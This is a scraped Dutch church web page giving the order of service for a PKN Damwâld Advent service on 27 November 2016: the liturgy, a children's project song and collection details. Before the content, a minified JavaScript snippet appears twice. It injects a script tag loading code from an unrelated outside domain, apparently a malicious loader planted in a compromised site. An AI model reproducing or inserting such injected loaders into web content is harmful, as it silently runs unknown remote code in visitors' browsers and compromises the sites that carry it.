;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 27 november 2016 9:30 uur - PKN Damwâld
zondag 27 november 2016
09:30 uur
Start KingKids kerstproject

Kerkdienst zondag 27 november 2016 9:30 uur

Thema: 1e Advent

Informatie

Voorganger:Ds. G. Timmer
Organist:Foeke Wiegersma
Thema:1e Advent
Mededeling:Start KingKids kerstproject
Liturgie
We zingen: Gezang 67: 1 en 2
Welkom en mededelingen
We zingen: Psalm 98: 1 en 2
Stil gebed, bemoediging en groet .
Aansteken van de eerste Adventskaars
Ik kom zegt Jezus,
deel het licht,
één ster vertelt ons
Zijn bericht.
Lied van Advent: Gezang 126: 1, 2 en 3
Gebed .
Project Kingkids
1 e advent, BELOFTE VAN EEN NIEUW BEGIN
- Uitleg en vertelling door Baukje van der Meulen
- Projectlied:
Wie Tamar ontmoet hoort van haar verhaal
hoe zij jaren hoopte moeder te zijn,
maar steeds weer was er verdriet en veel pijn,
want een kindje had zij niet.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

Maar God, Hij vergeet Zijn beloften niet
en Tamar wordt moeder, weg haar verdriet.
God geeft in Peres een heel nieuw begin,
onze toekomst krijgt weer zin.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

- Kinderen gaan naar het Skûlplak
We lezen: Genesis 38: 1-30
We zingen: ELB 109: 1, 2, 3 en 4
Verkondiging: Juda en Tamar
We zingen: Psalm 85: 1, 3 en 4
Dankgebed en voorbeden
Collecte
Slotlied ELB 203: 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Perspectief voor (ex) gedetineerden

In elf Exodushuizen in Nederland kunnen mensen na hun detentie verblijven om zo de draad van het gewone leven in de samenleving weer op te kunnen pakken. Veel gedetineerden willen na het uitzitten van hun straf de criminaliteit graag achter zich laten. Het blijft moeilijk om dit geheel op eigen kracht te doen. Exodus Nederland biedt sinds 1982 een woon- en werkprogramma dat ex-gedetineerden helpt hun leven na gevangenschap weer op te bouwen. Exodus onderscheidt zich door een structurele aanpak. Alle aspecten van het leven van (ex) gedetineerden komen aan bod. In Exodustermen zijn dat de vier "sleutels": wonen, werken, relaties en zingeving. Verder boekt Exodus goede resultaten door de persoonlijke en kleinschalige aanpak.

Tweede collecte: Kerk
Uitganscollecte: Kerk